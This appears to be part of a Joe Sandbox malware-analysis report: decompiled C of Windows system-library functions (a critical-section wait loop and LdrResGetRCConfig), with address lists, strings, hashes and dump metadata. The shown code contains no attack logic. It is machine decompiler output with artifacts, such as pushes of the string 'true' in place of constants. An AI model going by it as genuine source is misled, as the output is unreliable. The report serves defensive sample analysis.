							return E36B24B50(_t140, _t206, _v8 ^ _t254, _t234, _t244, _t251);
						}
					}
					L12:
					if(_t201 != 0xffffffff) {
						_push(_v120);
						_push(0);
						_push(_t201);
						_t140 = E36B229D0();
					} else {
						_t207 = _t241 + 4;
						_v76 =  &_v100 & 0xfffffffc;
						do {
							_t218 =  *[fs:0x18];
							_v100 = _t207;
							_v80 = 1;
							_v88 = 0;
							_v92 = 0;
							_v84 = 0;
							_v96 =  *((intOrPtr*)(_t218 + 0x24));
							_t208 = _v76;
							_t220 =  *((intOrPtr*)(_t218 + 0x30)) + 0x25c;
							_t169 = _t207 >> 0x00000005 & 0x0000007f;
							_v116 = _t220;
							_t235 =  *(_t220 + _t169 * 4);
							_v128 = _t220 + _t169 * 4;
							while(1) {
								_t172 = _t235 & 0xfffffffc;
								_t223 = _t235 & 0x00000003 | _t208;
								_v92 = _t172;
								if(_t172 != 0) {
									_v84 = 0;
									_t223 = _t223 | 0x00000002;
								} else {
									_v84 =  &_v100;
								}
								_t246 = _t223;
								_t173 = _t235;
								asm("lock cmpxchg [edi], esi");
								if(_t173 == _t235) {
									break;
								}
								_t235 = _t173;
							}
							_t241 = _v72;
							_t207 = _t241 + 4;
							if(((_t223 ^ _t235) & 0x00000002) != 0) {
								_t246 = _v128;
								_t236 =  *_t246;
								while(1) {
									_t226 = _t236 & 0xfffffffc;
									__eflags =  *(_t226 + 0x10);
									_v128 = _t226 + 0x10;
									if( *(_t226 + 0x10) == 0) {
										goto L31;
									}
									do {
										L31:
										_t183 = _t226;
										_t226 =  *(_t226 + 8);
										 *(_t226 + 0xc) = _t183;
										__eflags =  *(_t226 + 0x10);
									} while ( *(_t226 + 0x10) == 0);
									L32:
									 *_v128 =  *(_t226 + 0x10);
									__eflags = _t236 & 0x00000001;
									if((_t236 & 0x00000001) != 0) {
										_v130 = 1;
									} else {
										_v130 = 0;
										__eflags = _t236 & 0xfffffffc;
									}
									_t176 = _t236;
									asm("lock cmpxchg [esi], ecx");
									__eflags = _t176 - _t236;
									if(_t176 != _t236) {
										_t236 = _t176;
										_t226 = _t236 & 0xfffffffc;
										__eflags =  *(_t226 + 0x10);
										_v128 = _t226 + 0x10;
										if( *(_t226 + 0x10) == 0) {
											goto L31;
										}
										goto L32;
									}
									__eflags = _v130;
									if(_v130 != 0) {
										_t179 = _t176 & 0xfffffffc;
										__eflags = _t179;
										_v128 = _t179;
										if(_t179 != 0) {
											do {
												_t246 =  *(_t179 + 8);
												_t180 = _t179 + 0x14;
												 *_t180 = 2;
												__eflags =  *_t180;
												if( *_t180 == 0) {
													_push( *((intOrPtr*)(_v128 + 4)));
													E36B230B0();
												}
												_t179 = _t246;
												_v128 = _t179;
												__eflags = _t246;
											} while (_t246 != 0);
										}
									}
									goto L19;
								}
							}
							L19:
							_t234 =  &_v100;
							_t229 = _v116;
							if( *_t207 != _v112) {
								E36B0F946(_t229, _t234);
								_t140 = 0;
							} else {
								_t140 = L36B0F8A5(_t229, _t234, _v120, 0);
							}
							if(_t140 == 0x102) {
								L70:
								_t202 = _v108;
								_t247 =  *[fs:0x18];
								_push(_t202);
								_t142 = E36B26310( *_v120,  *((intOrPtr*)(_v120 + 4)), 0xff676980, 0xffffffff);
								_push(_t234);
								E36B6EF10(0x65, "true", "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t142);
								_t144 =  *_t241;
								_t255 = _t254 + 0x18;
								__eflags = _t144 - 0xffffffff;
								if(_t144 == 0xffffffff) {
									_t145 = 0;
									__eflags = 0;
								} else {
									_t145 =  *((intOrPtr*)(_t144 + 0x14));
								}
								_push(_t145);
								_push(_t241);
								_push( *((intOrPtr*)(_t241 + 0xc)));
								_push( *((intOrPtr*)(_t247 + 0x24)));
								E36B6EF10(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t247 + 0x20)));
								_t256 = _t255 + 0x20;
								_t203 = _t202 + 1;
								_t211 = _t241;
								_v108 = _t203;
								_t246 = E36B7A9AE(_t241);
								__eflags = _t203 - 2;
								if(_t203 > 2) {
									__eflags = _t241 - 0x36bd3390;
									if(_t241 != 0x36bd3390) {
										__eflags = _t246 - _v104;
										if(_t246 == _v104) {
											L36B7AB5E(_t211);
										}
									}
								}
								_push("RTL: Re-Waiting\n");
								_push(0);
								_push(0x65);
								_v104 = _t246;
								E36B6EF10();
								_t201 = _v68;
								_t254 = _t256 + 0xc;
								goto L9;
							} else {
								goto L22;
							}
							goto L23;
							L22:
							_t211 =  *_t207;
							_v112 = _t211;
						} while ((_t211 & 0x00000002) != 0);
					}
					L23:
					if(_t140 == 0x102) {
						goto L70;
					}
					goto L24;
				}
			}

0x36b0f4d0
0x36b0f4d0
0x36b0f4d8
0x36b0f4e5
0x36b0f4ec
0x36b0f4f5
0x36b0f4f7
0x36b0f4fb
0x36b0f4ff
0x36b0f504
0x36b0f508
0x36b0f516
0x36b4ff46
0x36b4ff4b
0x36b4ff4b
0x36b0f523
0x36b4ff5a
0x36b4ff5f
0x36b4ff61
0x36b4ff61
0x36b0f530
0x36b4ff6b
0x36b0f536
0x36b0f536
0x36b0f536
0x36b0f542
0x36b0f545
0x36b0f722
0x36b0f725
0x36b0f72c
0x36b0f730
0x36b4ff78
0x36b4ff7a
0x36b4ff7c
0x36b4ff7e
0x36b4ff87
0x36b4ff88
0x36b4ff8d
0x36b4ff8f
0x36b4ff9d
0x36b4ff91
0x36b4ff91
0x36b4ff94
0x36b4ff94
0x36b4ff8f
0x36b0f738
0x36b0f73c
0x36b0f73e
0x36b4ffa6
0x36b4ffaa
0x36b4ffad
0x36b4ffb3
0x36b4ffb4
0x36b4ffb4
0x36b4ffad
0x36b0f73e
0x36b0f54b
0x36b0f550
0x36b0f749
0x36b0f74c
0x36b0f753
0x36b0f759
0x36b0f75b
0x36b0f760
0x36b0f760
0x36b0f753
0x36b0f556
0x36b0f561
0x36b0f563
0x36b0f563
0x36b0f566
0x36b0f568
0x00000000
0x36b0f570
0x36b0f570
0x36b0f577
0x36b4ffc7
0x36b0f57d
0x36b0f57d
0x36b0f57d
0x36b0f585
0x36b4ffd1
0x36b4ffd7
0x36b4ffde
0x36b4ffe9
0x36b4fff0
0x36b4fffd
0x36b50004
0x36b5000b
0x36b50018
0x36b5001b
0x36b5001d
0x36b50034
0x36b50034
0x36b5001f
0x36b5001f
0x36b50022
0x00000000
0x36b50024
0x36b5002d
0x36b5002d
0x36b50022
0x36b5003c
0x36b50040
0x36b50041
0x36b50043
0x36b50048
0x36b50049
0x36b50049
0x00000000
0x36b0f682
0x36b0f684
0x36b501e2
0x36b501e7
0x36b501e8
0x36b501eb
0x36b0f825
0x36b0f82d
0x36b0f832
0x36b501f1
0x36b501f1
0x36b501f4
0x36b501f6
0x36b501ff
0x36b50203
0x36b50205
0x00000000
0x36b5020b
0x36b5020b
0x36b5020b
0x36b0f807
0x00000000
0x36b0f809
0x36b0f817
0x36b0f817
0x36b0f807
0x36b50205
0x36b0f822
0x36b0f68a
0x36b0f68f
0x36b5014a
0x36b5015a
0x36b5015d
0x36b5015f
0x36b50176
0x36b50176
0x36b50161
0x36b50161
0x36b50164
0x00000000
0x36b50166
0x36b5016f
0x36b5016f
0x36b50164
0x36b5017b
0x36b5017e
0x36b50184
0x36b5018a
0x36b50191
0x36b5019d
0x36b501a0
0x36b501a2
0x36b501b9
0x36b501b9
0x36b501a4
0x36b501a4
0x36b501a7
0x00000000
0x36b501a9
0x36b501b2
0x36b501b2
0x36b501a7
0x36b501be
0x36b501c1
0x36b501d7
0x36b501d7
0x36b501c1
0x36b50191
0x36b5017e
0x36b0f69c
0x36b0f69d
0x36b0f69e
0x36b0f6a9
0x36b0f6a9
0x36b0f684
0x36b0f58b
0x36b0f58e
0x36b50093
0x36b50097
0x36b50099
0x36b5009a
0x36b0f594
0x36b0f59b
0x36b0f59e
0x36b0f5a2
0x36b0f5a2
0x36b0f5a9
0x36b0f5ad
0x36b0f5b5
0x36b0f5bd
0x36b0f5c5
0x36b0f5d0
0x36b0f5d9
0x36b0f5dd
0x36b0f5e6
0x36b0f5e9
0x36b0f5ed
0x36b0f5f3
0x36b0f600
0x36b0f607
0x36b0f60a
0x36b0f60c
0x36b0f612
0x36b0f6b3
0x36b0f6bb
0x36b0f618
0x36b0f61c
0x36b0f61c
0x36b0f620
0x36b0f622
0x36b0f624
0x36b0f62a
0x00000000
0x00000000
0x36b50053
0x36b50053
0x36b0f630
0x36b0f636
0x36b0f63c
0x36b0f6c3
0x36b0f6c7
0x36b0f6d0
0x36b0f6d2
0x36b0f6d5
0x36b0f6dc
0x36b0f6e0
0x00000000
0x00000000
0x36b0f6e2
0x36b0f6e2
0x36b0f6e2
0x36b0f6e4
0x36b0f6e7
0x36b0f6ea
0x36b0f6ea
0x36b0f6f0
0x36b0f6f7
0x36b0f6f9
0x36b0f6fc
0x36b0f767
0x36b0f6fe
0x36b0f700
0x36b0f705
0x36b0f705
0x36b0f708
0x36b0f70a
0x36b0f70e
0x36b0f710
0x36b0f770
0x36b0f6d2
0x36b0f6d5
0x36b0f6dc
0x36b0f6e0
0x00000000
0x00000000
0x00000000
0x36b0f6e0
0x36b0f712
0x36b0f717
0x36b5005a
0x36b5005a
0x36b5005d
0x36b50061
0x36b50067
0x36b50067
0x36b5006f
0x36b50072
0x36b50074
0x36b50076
0x36b5007c
0x36b5007f
0x36b5007f
0x36b50084
0x36b50086
0x36b5008a
0x36b5008a
0x36b5008e
0x36b50061
0x00000000
0x36b0f717
0x36b0f6d0
0x36b0f642
0x36b0f644
0x36b0f648
0x36b0f650
0x36b0f6aa
0x36b0f6af
0x36b0f652
0x36b0f658
0x36b0f658
0x36b0f662
0x36b500a4
0x36b500a4
0x36b500ac
0x36b500b3
0x36b500c0
0x36b500c5
0x36b500d0
0x36b500d5
0x36b500d7
0x36b500da
0x36b500dd
0x36b500e4
0x36b500e4
0x36b500df
0x36b500df
0x36b500df
0x36b500e6
0x36b500e7
0x36b500e8
0x36b500eb
0x36b500fa
0x36b500ff
0x36b50102
0x36b50103
0x36b50105
0x36b5010e
0x36b50110
0x36b50113
0x36b50115
0x36b5011b
0x36b5011d
0x36b50121
0x36b50123
0x36b50123
0x36b50121
0x36b5011b
0x36b50128
0x36b5012d
0x36b5012f
0x36b50131
0x36b50135
0x36b5013a
0x36b5013e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x36b0f668
0x36b0f668
0x36b0f66a
0x36b0f66e
0x36b0f5a2
0x36b0f677
0x36b0f67c
0x00000000
0x00000000
0x00000000
0x36b0f67c

Strings

RTL: Re-Waiting, xrefs: 36B50128
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 36B500C7
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 36B500F1

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 516b336379633abcad8ed6878a788c54f41b0fc536af96589225cce8d48a46ab
Instruction ID: 04c2eb7104b53526ecf0cf9207b453dc7719977d2f9acc8fde32aa2bb49f2a21
Opcode Fuzzy Hash: 516b336379633abcad8ed6878a788c54f41b0fc536af96589225cce8d48a46ab
Instruction Fuzzy Hash: 32E1C174A08751DFE711CF28C840B5ABBE4FB84358F144A59FAA58B2D1DB74D845CF82

Uniqueness

Uniqueness Score: -1.00%

Function 36AEB5E0 Relevance: 4.1, Strings: 3, Instructions: 303
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E36AEB5E0(void* __ebx, void* __edi, signed int __esi, void* __eflags) {
				short _t100;
				short _t101;
				signed int* _t107;
				signed char* _t108;
				signed int _t109;
				signed int _t110;
				signed int* _t113;
				signed char* _t114;
				signed int _t115;
				signed int _t117;
				signed int _t125;
				void* _t129;
				void* _t131;
				void* _t133;
				void* _t135;
				void* _t137;
				void* _t139;
				void* _t141;
				void* _t143;
				signed int _t144;
				signed int _t145;
				signed int _t146;
				signed int _t147;
				signed int _t148;
				signed int _t150;
				short _t158;
				intOrPtr _t168;
				intOrPtr _t169;
				intOrPtr _t170;
				intOrPtr _t171;
				intOrPtr _t172;
				intOrPtr _t173;
				intOrPtr _t174;
				intOrPtr _t175;
				signed int _t184;
				signed int _t185;
				intOrPtr _t190;
				void* _t191;
				void* _t192;
				void* _t193;
				void* _t194;
				signed int _t201;
				signed int _t202;
				signed int _t205;
				signed int _t208;
				void* _t209;

				_push("true");
				_push(0x36bbbfb0);
				E36B37C40(__ebx, __edi, __esi);
				_t185 =  *(_t209 + 8);
				 *(_t209 - 0x34) = _t185;
				 *(_t209 - 0x40) =  *(_t209 + 0x10);
				 *((intOrPtr*)(_t209 - 0x28)) = L"MUI";
				 *((intOrPtr*)(_t209 - 0x24)) = 1;
				 *((intOrPtr*)(_t209 - 0x20)) = 0;
				 *(_t209 - 0x38) =  *(_t209 + 0xc);
				 *(_t209 - 0x30) = 0;
				_t158 = 0x2e;
				 *((short*)(_t209 - 0x50)) = _t158;
				_push("true");
				_pop(_t100);
				 *((short*)(_t209 - 0x4e)) = _t100;
				 *(_t209 - 0x4c) = L"LdrResGetRCConfig Enter";
				_push("true");
				_pop(_t101);
				 *((short*)(_t209 - 0x58)) = _t101;
				 *((short*)(_t209 - 0x56)) = _t158;
				 *(_t209 - 0x54) = L"LdrResGetRCConfig Exit";
				 *(_t209 - 0x3c) =  *(_t209 + 0x14) & 0x00002000;
				asm("sbb esi, esi");
				_t205 = (__esi & 0x00001000) + 0x1000;
				_t107 =  *( *[fs:0x30] + 0x50);
				if(_t107 != 0) {
					__eflags =  *_t107;
					if( *_t107 == 0) {
						goto L1;
					}
					_t108 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
					L2:
					if(( *_t108 & 0x00000001) != 0) {
						_t109 = E36AF3C40();
						_t198 = 0x7ffe0384;
						__eflags = _t109;
						if(_t109 == 0) {
							_t110 = 0x7ffe0384;
						} else {
							_t110 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
						}
						E36B6FC01(_t209 - 0x50,  *_t110 & 0x000000ff);
						_t185 =  *(_t209 - 0x34);
					} else {
						_t198 = 0x7ffe0384;
					}
					if(_t185 == 0) {
						 *(_t209 - 0x2c) = 0xc000000d;
						goto L8;
					} else {
						if( *((intOrPtr*)(_t209 + 0x18)) == 0) {
							L17:
							__eflags =  *(_t209 + 0xc);
							if( *(_t209 + 0xc) == 0) {
								__eflags =  *(_t209 - 0x3c);
								if(__eflags != 0) {
									goto L18;
								}
								_push(0);
								_push( *(_t209 + 0x14));
								_push(_t209 - 0x38);
								_push(_t185);
								_t117 = E36AEAB70(0, _t198, _t205, __eflags);
								__eflags = _t117;
								if(_t117 >= 0) {
									goto L18;
								}
								L12:
								 *[fs:0x0] =  *((intOrPtr*)(_t209 - 0x10));
								return _t117;
							}
							L18:
							_t201 = E36AEAD00( *(_t209 - 0x34),  *(_t209 - 0x38), _t205 | 0x00200030, _t209 - 0x28, 3, _t209 - 0x30, _t209 - 0x44, 0, 0);
							 *(_t209 - 0x2c) = _t201;
							__eflags = _t201;
							if(_t201 >= 0) {
								 *((intOrPtr*)(_t209 - 4)) = 0;
								_t208 =  *(_t209 - 0x30);
								__eflags =  *(_t209 - 0x3c);
								if( *(_t209 - 0x3c) != 0) {
									L56:
									 *((intOrPtr*)(_t209 - 4)) = 0xfffffffe;
									_t125 =  *(_t209 - 0x40);
									__eflags = _t125;
									if(_t125 != 0) {
										 *_t125 = _t208;
									}
									_t202 = 0;
									 *(_t209 - 0x2c) = 0;
									L23:
									__eflags =  *((char*)(_t209 + 0x18));
									if( *((char*)(_t209 + 0x18)) != 0) {
										__eflags = _t208;
										if(_t208 == 0) {
											_t208 = _t208 | 0xffffffff;
											__eflags = _t208;
										}
										_push(0);
										_push(_t202);
										_push(2);
										_push(0);
										_push(_t208);
										_push(0);
										__eflags = 0;
										E36AE93A6(0,  *(_t209 - 0x34), 0, _t202, _t208, 0);
									}
									_t198 = 0x7ffe0384;
									L8:
									_t113 =  *( *[fs:0x30] + 0x50);
									if(_t113 != 0) {
										__eflags =  *_t113;
										if( *_t113 == 0) {
											goto L9;
										}
										_t114 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
										L10:
										if(( *_t114 & 0x00000001) != 0) {
											_t115 = E36AF3C40();
											__eflags = _t115;
											if(_t115 != 0) {
												_t198 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
												__eflags =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											}
											E36B6FC01(_t209 - 0x58,  *_t198 & 0x000000ff);
										}
										_t117 =  *(_t209 - 0x2c);
										goto L12;
									}
									L9:
									_t114 = 0x7ffe0385;
									goto L10;
								}
								_t190 =  *((intOrPtr*)(_t208 + 4));
								__eflags = _t190 + _t208 - ( *(_t209 - 0x34) & 0xfffffffc) +  *(_t209 - 0x38);
								if(_t190 + _t208 > ( *(_t209 - 0x34) & 0xfffffffc) +  *(_t209 - 0x38)) {
									_t202 = 0xc000007b;
									 *(_t209 - 0x2c) = 0xc000007b;
									L70:
									 *((intOrPtr*)(_t209 - 4)) = 0xfffffffe;
									L21:
									__eflags = _t202;
									if(_t202 >= 0) {
										_t208 =  *(_t209 - 0x30);
									} else {
										_t208 = 0;
										 *(_t209 - 0x30) = 0;
									}
									goto L23;
								}
								_t202 = 0xc00b0003;
								 *(_t209 - 0x2c) = 0xc00b0003;
								_t168 =  *((intOrPtr*)(_t208 + 0x44));
								_t129 =  *((intOrPtr*)(_t208 + 0x48)) + _t168;
								__eflags = _t129 - _t190;
								if(_t129 > _t190) {
									goto L70;
								}
								__eflags = _t129 - _t168;
								if(_t129 < _t168) {
									goto L70;
								}
								_t169 =  *((intOrPtr*)(_t208 + 0x4c));
								_t131 =  *((intOrPtr*)(_t208 + 0x50)) + _t169;
								__eflags = _t131 - _t190;
								if(_t131 > _t190) {
									goto L70;
								}
								__eflags = _t131 - _t169;
								if(_t131 < _t169) {
									goto L70;
								}
								_t170 =  *((intOrPtr*)(_t208 + 0x54));
								_t133 =  *((intOrPtr*)(_t208 + 0x58)) + _t170;
								__eflags = _t133 - _t190;
								if(_t133 > _t190) {
									goto L70;
								}
								__eflags = _t133 - _t170;
								if(_t133 < _t170) {
									goto L70;
								}
								_t171 =  *((intOrPtr*)(_t208 + 0x5c));
								_t135 =  *((intOrPtr*)(_t208 + 0x60)) + _t171;
								__eflags = _t135 - _t190;
								if(_t135 > _t190) {
									goto L70;
								}
								__eflags = _t135 - _t171;
								if(_t135 < _t171) {
									goto L70;
								}
								_t172 =  *((intOrPtr*)(_t208 + 0x64));
								_t137 =  *((intOrPtr*)(_t208 + 0x68)) + _t172;
								__eflags = _t137 - _t190;
								if(_t137 > _t190) {
									goto L70;
								}
								__eflags = _t137 - _t172;
								if(_t137 < _t172) {
									goto L70;
								}
								_t173 =  *((intOrPtr*)(_t208 + 0x6c));
								_t139 =  *((intOrPtr*)(_t208 + 0x70)) + _t173;
								__eflags = _t139 - _t190;
								if(_t139 > _t190) {
									goto L70;
								}
								__eflags = _t139 - _t173;
								if(_t139 < _t173) {
									goto L70;
								}
								_t174 =  *((intOrPtr*)(_t208 + 0x74));
								_t141 =  *((intOrPtr*)(_t208 + 0x78)) + _t174;
								__eflags = _t141 - _t190;
								if(_t141 > _t190) {
									goto L70;
								}
								__eflags = _t141 - _t174;
								if(_t141 < _t174) {
									goto L70;
								}
								_t175 =  *((intOrPtr*)(_t208 + 0x7c));
								_t143 =  *((intOrPtr*)(_t208 + 0x80)) + _t175;
								__eflags = _t143 - _t190;
								if(_t143 > _t190) {
									goto L70;
								}
								__eflags = _t143 - _t175;
								if(_t143 < _t175) {
									goto L70;
								}
								__eflags =  *_t208 - 0xfecdfecd;
								if( *_t208 != 0xfecdfecd) {
									goto L70;
								}
								__eflags = _t190 -  *((intOrPtr*)(_t209 - 0x44));
								if(_t190 !=  *((intOrPtr*)(_t209 - 0x44))) {
									goto L70;
								}
								__eflags =  *((intOrPtr*)(_t208 + 8)) - 0x10000;
								if( *((intOrPtr*)(_t208 + 8)) != 0x10000) {
									goto L70;
								}
								_t176 =  *(_t208 + 0xc);
								__eflags =  *(_t208 + 0xc);
								if( *(_t208 + 0xc) != 0) {
									_t191 = 7;
									_t144 = E36B1B95A(_t176, _t191);
									__eflags = _t144;
									if(_t144 == 0) {
										goto L70;
									}
								}
								_t192 = 3;
								_t145 = E36B1B95A( *(_t208 + 0x10) & 0xffffffcf, _t192);
								__eflags = _t145;
								if(_t145 == 0) {
									goto L70;
								}
								_push("true");
								_pop(_t193);
								_t146 = E36B1B95A( *(_t208 + 0x10) & 0xfffffffc, _t193);
								__eflags = _t146;
								if(_t146 == 0) {
									goto L70;
								}
								__eflags =  *(_t208 + 0x10) & 0x00000001;
								if(( *(_t208 + 0x10) & 0x00000001) == 0) {
									L55:
									 *(_t209 - 0x2c) = 0;
									goto L56;
								}
								_t194 = 3;
								_t147 = E36B1B95A( *((intOrPtr*)(_t208 + 0x18)), _t194);
								__eflags = _t147;
								if(_t147 == 0) {
									goto L70;
								}
								_t182 =  *(_t208 + 0x14);
								__eflags =  *(_t208 + 0x14);
								if( *(_t208 + 0x14) != 0) {
									_t148 = E36B1B95A(_t182, 0x100);
									__eflags = _t148;
									if(_t148 == 0) {
										goto L70;
									}
								}
								goto L55;
							}
							__eflags = _t201 - 0xc000007b;
							if(_t201 != 0xc000007b) {
								_t202 = 0xc000008a;
								 *(_t209 - 0x2c) = 0xc000008a;
							}
							goto L21;
						}
						_t150 = E36AED530( *(_t209 - 0x34), 0, 0, "true");
						 *(_t209 - 0x30) = _t150;
						if(_t150 != 0xffffffff) {
							__eflags = _t150;
							if(_t150 == 0) {
								_t185 =  *(_t209 - 0x34);
								goto L17;
							} else {
								 *(_t209 - 0x2c) = 0;
								_t184 =  *(_t209 - 0x40);
								__eflags = _t184;
								if(_t184 != 0) {
									 *_t184 = _t150;
								}
								goto L8;
							}
						} else {
							 *(_t209 - 0x2c) = 0xc000008a;
							goto L8;
						}
					}
				}
				L1:
				_t108 = 0x7ffe0385;
				goto L2;
			}

0x36aeb5e0
0x36aeb5e2
0x36aeb5e7
0x36aeb5ec
0x36aeb5ef
0x36aeb5f5
0x36aeb5f8
0x36aeb5ff
0x36aeb608
0x36aeb60e
0x36aeb611
0x36aeb616
0x36aeb617
0x36aeb61b
0x36aeb61d
0x36aeb61e
0x36aeb622
0x36aeb629
0x36aeb62b
0x36aeb62c
0x36aeb630
0x36aeb634
0x36aeb643
0x36aeb648
0x36aeb651
0x36aeb659
0x36aeb65e
0x36b4363b
0x36b4363d
0x00000000
0x00000000
0x36b4364c
0x36aeb669
0x36aeb66c
0x36b43656
0x36b4365b
0x36b43660
0x36b43662
0x36b43674
0x36b43664
0x36b4366d
0x36b4366d
0x36b4367c
0x36b43681
0x36aeb672
0x36aeb672
0x36aeb672
0x36aeb679
0x36b43689
0x00000000
0x36aeb67f
0x36aeb682
0x36aeb6e9
0x36aeb6e9
0x36aeb6ec
0x36aeb8ee
0x36aeb8f1
0x00000000
0x00000000
0x36aeb8f7
0x36aeb8f8
0x36aeb8fe
0x36aeb8ff
0x36aeb900
0x36aeb905
0x36aeb907
0x00000000
0x00000000
0x36aeb6c2
0x36aeb6c5
0x36aeb6d1
0x36aeb6d1
0x36aeb6f2
0x36aeb714
0x36aeb716
0x36aeb719
0x36aeb71b
0x36aeb762
0x36aeb765
0x36aeb768
0x36aeb76c
0x36aeb8d4
0x36aeb8d4
0x36aeb8db
0x36aeb8de
0x36aeb8e0
0x36aeb8e2
0x36aeb8e2
0x36aeb8e4
0x36aeb8e6
0x36aeb73a
0x36aeb73a
0x36aeb73e
0x36aeb740
0x36aeb742
0x36aeb744
0x36aeb744
0x36aeb744
0x36aeb747
0x36aeb748
0x36aeb749
0x36aeb74b
0x36aeb74c
0x36aeb74d
0x36aeb74e
0x36aeb753
0x36aeb753
0x36aeb758
0x36aeb6a0
0x36aeb6a6
0x36aeb6ab
0x36b436f3
0x36b436f6
0x00000000
0x00000000
0x36b43705
0x36aeb6b6
0x36aeb6b9
0x36b4370f
0x36b43714
0x36b43716
0x36b43721
0x36b43721
0x36b43721
0x36b4372d
0x36b4372d
0x36aeb6bf
0x00000000
0x36aeb6bf
0x36aeb6b1
0x36aeb6b1
0x00000000
0x36aeb6b1
0x36aeb772
0x36aeb781
0x36aeb783
0x36b43695
0x36b4369a
0x36b436ad
0x36b436ad
0x36aeb72d
0x36aeb72d
0x36aeb72f
0x36b436eb
0x36aeb735
0x36aeb735
0x36aeb737
0x36aeb737
0x00000000
0x36aeb72f
0x36aeb789
0x36aeb78e
0x36aeb791
0x36aeb797
0x36aeb799
0x36aeb79b
0x00000000
0x00000000
0x36aeb7a1
0x36aeb7a3
0x00000000
0x00000000
0x36aeb7a9
0x36aeb7af
0x36aeb7b1
0x36aeb7b3
0x00000000
0x00000000
0x36aeb7b9
0x36aeb7bb
0x00000000
0x00000000
0x36aeb7c1
0x36aeb7c7
0x36aeb7c9
0x36aeb7cb
0x00000000
0x00000000
0x36aeb7d1
0x36aeb7d3
0x00000000
0x00000000
0x36aeb7d9
0x36aeb7df
0x36aeb7e1
0x36aeb7e3
0x00000000
0x00000000
0x36aeb7e9
0x36aeb7eb
0x00000000
0x00000000
0x36aeb7f1
0x36aeb7f7
0x36aeb7f9
0x36aeb7fb
0x00000000
0x00000000
0x36aeb801
0x36aeb803
0x00000000
0x00000000
0x36aeb809
0x36aeb80f
0x36aeb811
0x36aeb813
0x00000000
0x00000000
0x36aeb819
0x36aeb81b
0x00000000
0x00000000
0x36aeb821
0x36aeb827
0x36aeb829
0x36aeb82b
0x00000000
0x00000000
0x36aeb831
0x36aeb833
0x00000000
0x00000000
0x36aeb839
0x36aeb842
0x36aeb844
0x36aeb846
0x00000000
0x00000000
0x36aeb84c
0x36aeb84e
0x00000000
0x00000000
0x36aeb854
0x36aeb85a
0x00000000
0x00000000
0x36aeb860
0x36aeb863
0x00000000
0x00000000
0x36aeb869
0x36aeb870
0x00000000
0x00000000
0x36aeb876
0x36aeb879
0x36aeb87b
0x36b436bb
0x36b436bc
0x36b436c1
0x36b436c3
0x00000000
0x00000000
0x36b436c5
0x36aeb889
0x36aeb88a
0x36aeb88f
0x36aeb891
0x00000000
0x00000000
0x36aeb89d
0x36aeb89f
0x36aeb8a0
0x36aeb8a5
0x36aeb8a7
0x00000000
0x00000000
0x36aeb8ad
0x36aeb8b1
0x36aeb8d1
0x36aeb8d1
0x00000000
0x36aeb8d1
0x36aeb8b5
0x36aeb8b9
0x36aeb8be
0x36aeb8c0
0x00000000
0x00000000
0x36aeb8c6
0x36aeb8c9
0x36aeb8cb
0x36b436cf
0x36b436d4
0x36b436d6
0x00000000
0x00000000
0x36b436d8
0x00000000
0x36aeb8cb
0x36aeb71d
0x36aeb723
0x36aeb725
0x36aeb72a
0x36aeb72a
0x00000000
0x36aeb723
0x36aeb68c
0x36aeb691
0x36aeb697
0x36aeb6d4
0x36aeb6d6
0x36aeb6e6
0x00000000
0x36aeb6d8
0x36aeb6d8
0x36aeb6db
0x36aeb6de
0x36aeb6e0
0x36aeb6e2
0x36aeb6e2
0x00000000
0x36aeb6e0
0x36aeb699
0x36aeb699
0x00000000
0x36aeb699
0x36aeb697
0x36aeb679
0x36aeb664
0x36aeb664
0x00000000

Strings

LdrResGetRCConfig Exit, xrefs: 36AEB634
LdrResGetRCConfig Enter, xrefs: 36AEB622
MUI, xrefs: 36AEB5F8, 36AEB707

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
API String ID: 0-1145731471
Opcode ID: 010c278142a50de6cbbc60f926ce86e5a99ab7488c7a27c05d24b221b235792f
Instruction ID: 8192fa4636ce6ecc0a2fc305e32d905f4f47275d7bb111a8972fe79ddca4a425
Opcode Fuzzy Hash: 010c278142a50de6cbbc60f926ce86e5a99ab7488c7a27c05d24b221b235792f
Instruction Fuzzy Hash: 72B1EC74A067168BEB16EF6AC990B9DB3F1EF45794F684429E811EB780D770E840CF20

Uniqueness

Uniqueness Score: -1.00%

Function 36B67090 Relevance: 4.0, Strings: 3, Instructions: 233
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E36B67090(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t121;
				signed int _t124;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				signed int _t137;
				signed int _t141;
				signed int _t143;
				signed int _t155;
				signed int _t159;
				signed int _t161;
				signed int* _t164;
				signed int _t171;
				signed int _t173;
				signed int _t174;
				signed int _t175;
				void* _t176;
				signed int _t179;
				void* _t180;
				signed int _t182;
